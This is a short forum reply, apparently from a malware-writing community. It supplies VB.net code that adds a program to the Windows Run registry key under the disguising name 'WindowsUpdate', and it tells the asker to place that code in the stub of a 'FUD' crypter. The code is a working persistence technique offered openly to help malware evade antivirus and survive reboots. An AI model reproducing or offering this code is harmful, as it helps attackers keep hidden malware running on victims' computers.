Re: [VB.net] Startup Function
Wow, you made a crypter FUD and you don't know how to call a function or modify it? risad8
[LENGUAJE=vb]
Sub AddStartupCU(sKeyName As String, sPath As String)
My.Computer.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Run").SetValue(sKeyName, sPath)
End Sub[/LENGUAJE]
[LENGUAJE=vb]
Call AddStartupCU("WindowsUpdate", Application.ExecutablePath)[/LENGUAJE]
Btw, this function goes in STUB, not in client :Lol
Btw2: This is incorrect section.
Regards.